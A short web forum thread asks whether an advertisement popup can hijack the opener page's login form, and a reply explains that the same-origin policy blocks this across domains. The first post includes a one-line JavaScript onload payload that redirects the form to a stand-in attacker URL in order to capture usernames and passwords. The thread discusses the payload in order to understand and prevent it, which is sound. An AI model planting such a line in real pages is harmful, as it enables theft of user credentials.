form action password sniffing?

  • Thread starter riku at wap ice dot com
  • Start date
R

riku at wap ice dot com

Security hole for dummies:

Let's say I have a login screen with a lots of advertisement (links).
One of those links is opened in a new window, and there is the following:

<body
onload="opener.document.forms[0].action='http://www.hackerz.com/PasswordDatabase.php';">

After clicking the link and reading the advertisement, I go on "logging
in" on the first window. After I submit, the form data, username,
password and all is submitted to a third party..


Is this old news? (I don't follow these news too often..) Any comments,
fixes, anything?
 
E

Erwin Moller

Hi,

my 2 cents:

In the case you describe the popstuff is probably hosted somewhere else, via
some advertising company (hate them).
I think all modern browsers don't allow javascript doing anything on a
window that is hosted from another server.

so: window1: html://www.serv1.com/page.htm
window2: html://www.serv2.com/page.htm

The script on window2 cannot access window1.

In that case you are safe.

If however both are hosted from the same server, your trick will work.
Just another good reason not to fill your own server with scripts from some
untrusted party.

Regards,
Erwin Moller
 
R

riku at wap ice dot com

I think all modern browsers don't allow javascript doing anything on a
window that is hosted from another server.

Ok, that helps.. I had only one host to test it on.
If however both are hosted from the same server, your trick will work.

A good reason not to use any domains offering free web pages under the
same hostname.. I wonder if there are any abuses using this trick?

Thanks for replying!
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Members online

Forum statistics

Threads
473,744
Messages
2,569,482
Members
44,901
Latest member
Noble71S45

Latest Threads

Top